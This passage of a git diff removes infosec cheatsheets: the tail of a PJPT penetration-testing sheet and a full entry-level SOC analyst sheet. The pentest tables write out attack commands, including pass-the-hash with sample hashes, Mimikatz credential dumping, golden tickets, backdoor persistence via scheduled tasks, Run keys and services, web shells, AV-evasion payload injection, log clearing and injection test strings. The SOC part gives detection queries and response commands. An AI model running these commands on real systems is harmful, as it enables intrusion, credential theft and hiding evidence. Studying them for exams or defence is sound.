 | Token impersonation | Incognito | `incognito_cmd_exe list_tokens -u` | List available tokens |
 | | Rotten Potato | `rottenpotato.exe` | Token impersonation technique |
 | DLL hijacking | Process Monitor | Filter for "NAME NOT FOUND" + "PATH" | Find missing DLLs |
 | **Linux** ||||
 | Initial enumeration | LinPEAS | `./linpeas.sh` | Automated privilege escalation checks |
 | | Linux Smart Enumeration | `./lse.sh -l 2` | Level 2 verbosity enumeration |
 | SUID binaries | Find | `find / -perm -u=s -type f 2>/dev/null` | Find SUID executables |
 | Sudo rights | Sudo | `sudo -l` | List allowed sudo commands |
 | Kernel exploits | Linux-Exploit-Suggester | `./linux-exploit-suggester.sh` | Match kernel against known exploits |
 | Cron jobs | Check crontab | `cat /etc/crontab` | Find scheduled tasks |
 | | Pspy | `./pspy64` | Monitor processes without root |
 | Capabilities | Check caps | `getcap -r / 2>/dev/null` | Find binaries with capabilities |
 | Path abuse | PATH variable | `echo $PATH` | Check for writeable directories in PATH |
 ## Lateral Movement Techniques
 | Technique | Tool/Command | Example | Notes |
 |-----------|--------------|---------|-------|
 | **Pass the Hash** ||||
 | PtH with CrackMapExec | CrackMapExec | `crackmapexec smb 192.168.1.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206e4aa04820ee3a93175` | Use hash instead of password |
 | PtH with Impacket | Impacket | `psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206e4aa04820ee3a93175 administrator@192.168.1.100` | Execute commands via SMB |
 | **WMI** ||||
 | Remote execution | WMIexec | `wmiexec.py domain/user:password@192.168.1.100` | Execute commands via WMI |
 | | PowerShell | `Invoke-WMIMethod -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami > C:\output.txt" -ComputerName TARGETPC` | PowerShell-based WMI |
 | **PowerShell Remoting** ||||
 | PSRemoting | PowerShell | `Enter-PSSession -ComputerName TARGETPC` | Interactive PowerShell session |
 | | PowerShell | `Invoke-Command -ComputerName TARGETPC -ScriptBlock {whoami}` | Execute remote command |
 | **Other Methods** ||||
 | RDP | RDesktop | `rdesktop -u user -p password 192.168.1.100` | GUI access (Linux client) |
 | | Xfreerdp | `xfreerdp /u:user /p:password /v:192.168.1.100` | Better RDP client for Linux |
 | Mimikatz | Mimikatz | `sekurlsa::logonpasswords` | Extract plaintext credentials |
 | | PowerShell | `Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'` | PowerShell-based Mimikatz |
 ## Post Exploitation & Persistence
 | Task | Tool/Command | Example | Notes |
 |------|--------------|---------|-------|
 | **Data Exfiltration** ||||
 | SMB | SMBclient | `smbclient \\\\192.168.1.100\\share -U user%password` | Transfer via SMB |
 | Web-based | SimpleHTTPServer | `python3 -m http.server 8000` | Host files on attacker machine |
 | | Wget/cURL | `wget http://192.168.1.100:8000/file` | Download from victim |
 | | PowerShell | `Invoke-WebRequest -Uri "http://192.168.1.100:8000/file" -OutFile "C:\file"` | PowerShell download |
 | **Persistence** ||||
 | Scheduled tasks | Schtasks | `schtasks /create /tn "MyTask" /tr "C:\evil.exe" /sc daily /ru "SYSTEM"` | Create persistent task |
 | Registry | Reg | `reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\evil.exe"` | Run key persistence |
 | Service | SC | `sc create "Backdoor" binpath= "cmd.exe /k C:\evil.exe"` | Create persistent service |
 | Golden Ticket | Mimikatz | `kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-X-Y-Z /krbtgt:krbtgthash /ptt` | Create Kerberos golden ticket |
 ## Web Application Security Testing
 | Category | Tool/Command | Example | Notes |
 |----------|--------------|---------|-------|
 | **Scanning** ||||
 | Directory discovery | Gobuster | `gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt` | Find hidden directories |
 | | Dirsearch | `dirsearch -u http://192.168.1.100` | Python-based directory scanner |
 | Vulnerability scanning | Nikto | `nikto -h http://192.168.1.100` | General web vulnerability scanner |
 | | WPScan | `wpscan --url http://192.168.1.100 --enumerate u` | WordPress vulnerability scanner |
 | **Manual Testing** ||||
 | SQL Injection | sqlmap | `sqlmap -u "http://192.168.1.100/page.php?id=1" --dbs` | Automated SQL injection |
 | | Manual | `' OR 1=1 --` | Basic SQL injection test |
 | XSS | Manual | `<script>alert(1)</script>` | Basic XSS test |
 | Command Injection | Manual | `; whoami` | Basic command injection test |
 | File inclusion | Manual | `../../etc/passwd` | LFI test |
 | **Web Shells** ||||
 | PHP shell | Weevely | `weevely generate password /path/to/shell.php` | Generate obfuscated PHP shell |
 | | Upload | Via vulnerable file upload or LFI/RFI | Get web shell access |
 | JSP shell | Web-shell | Use platform-specific shells | JSP for Tomcat servers |
 | | Upload | Via vulnerable file upload or LFI/RFI | Get web shell access |
 | ASPX shell | Web-shell | Use platform-specific shells | ASPX for IIS servers |
 | | Upload | Via vulnerable file upload or LFI/RFI | Get web shell access |
 ## Basic Evasion Techniques
 | Technique | Tool/Command | Example | Notes |
 |-----------|--------------|---------|-------|
 | **AV Evasion** ||||
 | Payload obfuscation | Veil | `./Veil.py` | Generate AV-evading payloads |
 | | Shellter | `shellter -a -f legit.exe -p custom` | Inject payload into legitimate binary |
 | PowerShell obfuscation | Invoke-Obfuscation | `Invoke-Obfuscation` | Obfuscate PowerShell scripts |
 | **Detection Evasion** ||||
 | Clear logs | Wevtutil | `wevtutil cl System` | Clear Windows event logs |
 | | PowerShell | `Clear-EventLog -LogName Security` | PowerShell-based log clearing |
 | Clear bash history | Bash | `history -c && rm ~/.bash_history` | Clear bash history |
 | Disable auditing | Auditpol | `auditpol /set /category:"System" /success:disable /failure:disable` | Disable system auditing |
 ## PJPT Exam Preparation Tips
 | Area | Focus On | Example Tools |
 |------|----------|--------------|
 | Active Directory | LLMNR/NBT-NS poisoning, Kerberoasting, AS-REP roasting | Responder, Impacket, Rubeus |
 | Windows privilege escalation | Service misconfigurations, token impersonation | PowerUp, WinPEAS |
 | Linux privilege escalation | SUID binaries, sudo rights | LinPEAS, GTFOBins |
 | Lateral movement | Pass-the-hash, Mimikatz | CrackMapExec, Impacket |
 | Web vulnerabilities | SQL injection, file inclusion | sqlmap, manual testing |
--- a/infosec/soc-analyst.md
+++ b/infosec/soc-analyst.md
@ -1,192 +0,0 @@
 # Entry-Level SOC Analyst Cheatsheet
 ## Security Monitoring Fundamentals
 | Concept | Description | Examples |
 |---------|-------------|----------|
 | **Security Incident** | Any event that potentially threatens security | Malware infection, unauthorized access, data breach |
 | **Alert Triage** | Process of evaluating and prioritizing alerts | Critical (1), High (2), Medium (3), Low (4) |
 | **False Positive** | Alert that incorrectly indicates malicious activity | Legitimate admin activity flagged as suspicious |
 | **False Negative** | Failure to detect actual malicious activity | Intrusion not generating alerts |
 | **IOC (Indicator of Compromise)** | Evidence of potential security breach | Malicious IP, hash, domain, unusual behavior |
 | **TTP (Tactics, Techniques, Procedures)** | Patterns of adversary behavior | MITRE ATT&CK framework behaviors |
 | **SIEM (Security Information and Event Management)** | Centralized log collection and analysis platform | Splunk, ELK Stack, QRadar, LogRhythm |
 | **Use Case** | Specific detection scenario with defined logic | Detect multiple failed logins across systems |
 | **Playbook** | Step-by-step response procedure | Malware containment playbook |
 ## Log Analysis Fundamentals
 | Log Type | Key Information | Important Fields |
 |----------|-----------------|------------------|
 | **Windows Event Logs** | Windows system and security events | EventID, Account Name, Process ID, Logon Type |
 | **Authentication Logs** | Login attempts and session data | Username, Source IP, Timestamp, Success/Failure |
 | **Firewall Logs** | Network traffic allowed/blocked | Source/Destination IP, Port, Action, Protocol |
 | **Web Server Logs** | HTTP/HTTPS request details | Client IP, Request URL, Status Code, User-Agent |
 | **DNS Logs** | Domain resolution requests | Query Name, Query Type, Response, Client IP |
 | **Proxy Logs** | Web traffic details | URL, User, Category, Action, Bytes Transferred |
 | **VPN Logs** | Remote access connections | Username, Source IP, Connection Duration, Bytes |
 | **Email Logs** | Email transaction details | Sender, Recipient, Subject, Attachments, Headers |
 ## Critical Windows Event IDs
 | Event ID | Description | Why It Matters |
 |----------|-------------|----------------|
 | 4624 | Successful logon | Establish access patterns & identify unusual logins |
 | 4625 | Failed logon | May indicate brute force attempts |
 | 4720 | User account created | Potential unauthorized account creation |
 | 4722 | User account enabled | Account status changes |
 | 4724 | Password reset attempt | Potential credential compromise |
 | 4728/4732/4756 | User added to security group | Privilege escalation |
 | 4776 | Successful/failed account authentication | Credential validation activity |
 | 7045 | Service installed | Potential persistence mechanism |
 | 4688 | Process creation | Command execution monitoring |
 | 4698 | Scheduled task created | Potential persistence technique |
 | 1102 | Audit log cleared | Potential evidence tampering |
 | 4672 | Special privileges assigned to new logon | Admin or sensitive privilege assignment |
 ## Linux Logs to Monitor
 | Log File | Content | Suspicious Signs |
 |----------|---------|------------------|
 | `/var/log/auth.log` or `/var/log/secure` | Authentication attempts | Multiple failed logins, unusual login times |
 | `/var/log/syslog` | General system logs | Unexpected service restarts, errors |
 | `/var/log/messages` | General system messages | System errors, hardware failures |
 | `/var/log/apache2/access.log` | Web server access | Directory traversal, unusual user agents |
 | `/var/log/apache2/error.log` | Web server errors | SQL injection attempts, execution errors |
 | `/var/log/cron` | Scheduled task execution | Unauthorized cron jobs |
 | `/var/log/lastlog` | Last login information | Login from unusual locations |
 | `/var/log/wtmp` & `/var/log/btmp` | Login records & failed attempts | Multiple failed logins |
 | `~/.bash_history` | Command history | Suspicious commands, data exfiltration |
 ## SIEM Query Examples (Splunk SPL)
 | Use Case | Example Query | Purpose |
 |----------|--------------|---------|
 | Failed Logins | `index=windows EventCode=4625 \| stats count by src_ip, user` | Detect potential brute force |
 | Suspicious PowerShell | `index=windows EventCode=4688 process="*powershell*" "-enc*" \| table Computer, user, process, CommandLine` | Find encoded PowerShell commands |
 | Account Creation | `index=windows EventCode=4720 \| table _time, user, Account_Name` | Monitor user creation |
 | Privilege Escalation | `index=windows (EventCode=4728 OR EventCode=4732 OR EventCode=4756) Group_Name="*admin*" \| table _time, user, Account_Name, Group_Name` | Detect admin group additions |
 | Lateral Movement | `index=windows EventCode=4624 Logon_Type=3 \| stats count by dest, src, user` | Identify network logons |
 | Suspicious DNS | `index=dns query_type=A \| stats count by query, answer \| where count < 5` | Find rare DNS queries |
 | Persistence | `index=windows (EventCode=4698 OR EventCode=7045) \| table _time, Computer, user, Service_Name, Service_File_Name` | Detect scheduled tasks or services |
 | C2 Traffic | `index=proxy method=POST \| stats sum(bytes_out) as outbound by url, src_ip \| where outbound > 1000000` | Find large data uploads |
 ## Common SOC Tools
 | Tool Type | Examples | Use Cases |
 |-----------|----------|-----------|
 | **SIEM** | Splunk, ELK Stack, QRadar | Centralized log analysis, alert generation |
 | **EDR** | CrowdStrike, SentinelOne, Microsoft Defender for Endpoint | Endpoint protection and response |
 | **Network Monitoring** | Wireshark, Zeek, Suricata | Packet analysis, network IDS |
 | **Threat Intelligence** | VirusTotal, OTX, MISP | IOC lookup, threat data correlation |
 | **Sandbox** | Cuckoo, ANY.RUN, Hybrid Analysis | Malware analysis in isolated environment |
 | **Vulnerability Scanner** | Nessus, OpenVAS, Qualys | Identify system vulnerabilities |
 | **Case Management** | TheHive, RTIR, ServiceNow | Track and manage incidents |
 | **Phishing Analysis** | PhishTool, URL2PNG, Email Header Analyzer | Analyze suspicious emails |
 ## Incident Response Steps
 | Phase | Actions | Documentation |
 |-------|---------|---------------|
 | **1. Preparation** | Develop IR plans, implement security controls | IR policy, playbooks, contact lists |
 | **2. Identification** | Detect and validate security incidents | Alert data, initial findings report |
 | **3. Containment** | Isolate affected systems to prevent spread | Containment actions report |
 | **4. Eradication** | Remove malware/compromise from systems | Cleanup procedures performed |
 | **5. Recovery** | Restore systems to normal operation | Recovery validation checklist |
 | **6. Lessons Learned** | Document findings and improve process | Post-incident report |
 ## Common Attack Vectors & Detection Methods
 | Attack Type | Indicators | Detection Methods |
 |-------------|------------|-------------------|
 | **Phishing** | Suspicious emails, malicious links/attachments | Email filtering logs, user reports, URL analysis |
 | **Malware** | Unusual processes, network connections, file modifications | AV/EDR alerts, file hash analysis, behavioral analysis |
 | **Brute Force** | Multiple failed authentication attempts | Auth logs, threshold alerting, account lockouts |
 | **Credential Stuffing** | Successful logins from various locations/devices | Auth logs, impossible travel detection |
 | **Web Application Attacks** | SQL injection, XSS, path traversal in web logs | WAF logs, web server logs, error patterns |
 | **Privilege Escalation** | Unexpected admin actions, permission changes | User permission auditing, process monitoring |
 | **Data Exfiltration** | Large outbound transfers, unusual destinations | Proxy/firewall logs, DLP alerts, NetFlow analysis |
 | **Living Off The Land** | Abuse of legitimate tools (PowerShell, WMI, etc.) | Command-line logging, script block logging, behavioral analysis |
 ## Network Traffic Analysis Basics
 | Protocol | Port | Suspicious Indicators |
 |----------|------|------------------------|
 | **HTTP/HTTPS** | 80/443 | Unusual user-agents, base64 in URLs, unusual domains/paths |
 | **DNS** | 53 | Domain generation algorithms, DNS tunneling, unusual TXT records |
 | **SMB** | 445 | Unauthorized access attempts, unusual file operations |
 | **RDP** | 3389 | Brute force attempts, unauthorized connections |
 | **SSH** | 22 | Brute force attempts, connections from unusual locations |
 | **FTP** | 21 | Anonymous access, unauthorized file transfers |
 | **SMTP/POP3/IMAP** | 25, 110, 143 | Unusual volume, unauthorized relay attempts |
 | **NetFlow Indicators** | N/A | Unusual data volume, beaconing, scan patterns |
 ## Malware Types & Characteristics
 | Malware Type | Behavior | Common Indicators |
 |--------------|----------|-------------------|
 | **Virus** | Self-replicating, infects other files | Modified system files, integrity failures |
 | **Worm** | Self-propagating across networks | Unusual network traffic, port scanning |
 | **Trojan** | Disguised as legitimate software | Unexpected network connections, hidden processes |
 | **Ransomware** | Encrypts data for ransom | File encryption, ransom notes, destruction of backups |
 | **Rootkit** | Hides deep in system to avoid detection | Hidden processes, modified system calls |
 | **Backdoor** | Provides persistent remote access | Unexpected listening ports, unusual connections |
 | **Keylogger** | Records keystrokes | Unusual process access to input devices, suspicious files |
 | **Fileless Malware** | Operates in memory without files | PowerShell/WMI activity, unusual registry changes |
 | **Cryptominer** | Uses resources to mine cryptocurrency | High CPU usage, mining pool connections |
 ## Basic Threat Hunting Concepts
 | Concept | Description | Example Implementation |
 |---------|-------------|------------------------|
 | **Threat Hunting Hypothesis** | Question-based approach to investigate potential compromise | "Are users running unsigned PowerShell scripts?" |
 | **IOC Searching** | Hunting for known indicators | Search for known malicious hashes or domains |
 | **TTP Hunting** | Hunting for attack techniques regardless of tools | Search for any evidence of credential dumping behavior |
 | **Baselining** | Establishing normal to find abnormal | Document normal authentication patterns to spot anomalies |
 | **Stacking** | Analyzing frequency distributions to find outliers | Stack process names to find rare processes |
 | **Clustering** | Grouping similar events to spot anomalies | Cluster login times to find unusual access patterns |
 ## MITRE ATT&CK Framework Fundamentals
 | Tactic | Description | Example Techniques |
 |--------|-------------|-------------------|
 | **Initial Access** | How attackers get in | Phishing, exploitation of public-facing application |
 | **Execution** | Running malicious code | Command line interface, PowerShell, scripts |
 | **Persistence** | Maintaining access | Registry Run keys, scheduled tasks, startup items |
 | **Privilege Escalation** | Getting higher permissions | Access token manipulation, bypass UAC |
 | **Defense Evasion** | Avoiding detection | File deletion, clearing logs, obfuscation |
 | **Credential Access** | Stealing credentials | Credential dumping, keylogging, brute force |
 | **Discovery** | Learning the environment | Network/account/system discovery |
 | **Lateral Movement** | Moving through environment | Pass the hash, remote services |
 | **Collection** | Gathering data of interest | Input capture, screen capture, data from local system |
 | **Command and Control** | Communicating with victims | Encrypted communications, web protocols |
 | **Exfiltration** | Stealing data | Data compressed, encrypted, transferred |
 | **Impact** | Disrupting business/operations | Data encryption, system shutdown, defacement |
 ## Useful CLI Commands for Incident Response
 | OS | Command | Purpose |
 |----|---------|---------|
 | **Windows** | `Get-Process \| Where-Object {$_.Company -eq $null}` | Find processes with no company name |
 | | `Get-WinEvent -FilterHashtable @{Logname='Security';ID=4624} -MaxEvents 10` | View recent successful logons |
 | | `netstat -ano \| findstr ESTABLISHED` | View established connections |
 | | `schtasks /query /fo LIST /v` | List all scheduled tasks with details |
 | | `wmic startup list full` | List all startup items |
 | | `wmic process get caption,commandline,processid` | List running processes with command lines |
 | **Linux** | `ps auxf` | Show process tree |
 | | `netstat -tulpn` | Show active connections and listening ports |
 | | `lsof -i` | List open files and network connections |
 | | `grep -i "failed password" /var/log/auth.log` | Find failed login attempts |
 | | `find / -mtime -1 -ls` | Find files modified in the last day |
 | | `cat /var/log/auth.log \| grep -E 'session opened\|session closed'` | Find user sessions |
 ## Cyber Threat Intelligence Resources
 | Resource Type | Examples | Use Cases |
 |---------------|----------|-----------|
 | **Open Source Feeds** | AlienVault OTX, MISP, ThreatFox | Collect IOCs, research campaigns |
 | **Vendor Blogs** | Mandiant, CrowdStrike, Microsoft Security | Technical analysis of threats |
 | **Government Resources** | US-CERT, MS-ISAC, CISA Advisories | Vulnerability and threat alerts |
 | **Malware Databases** | VirusTotal, Hybrid Analysis, MalwareBazaar | File reputation, malware analysis |
 | **IP/Domain Reputation** | AbuseIPDB, Cisco Talos, URLhaus | Check for known malicious addresses |
 | **Sandbox Analysis** | ANY.RUN, Joe Sandbox, Cuckoo | Dynamic malware analysis |